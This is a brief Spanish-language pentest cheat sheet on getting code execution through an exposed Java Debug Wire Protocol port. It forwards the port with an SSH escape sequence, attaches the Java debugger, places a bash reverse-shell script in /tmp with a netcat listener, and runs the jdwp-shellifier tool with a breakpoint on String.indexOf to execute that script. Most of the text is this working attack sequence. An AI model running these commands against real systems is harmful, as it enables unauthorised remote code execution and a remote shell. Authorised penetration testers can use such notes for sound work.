Pentest JDWP

Tool: JDWP Shellifier Installation: https://github.com/IOActive/jdwp-shellifier * Requires JDB (Java Debugger): https://www.oracle.com/technetwork/java/javase/downloads/jdk8-downloads-2133151.html

# Hacemos un port forwarding del puerto en el que se esté usando con el truco de "new line" ~C -L8000:localhost:8000 "enter enter"
# jdb -attach 8000
# Creamos una reverse shell de bash en /tmp o /dev/shm y ponemos nc a la escucha
python jdwp-shellifier.py -t 127.0.0.1 --break-on "java.lang.String.indexOf" --cmd "/tmp/rev.sh"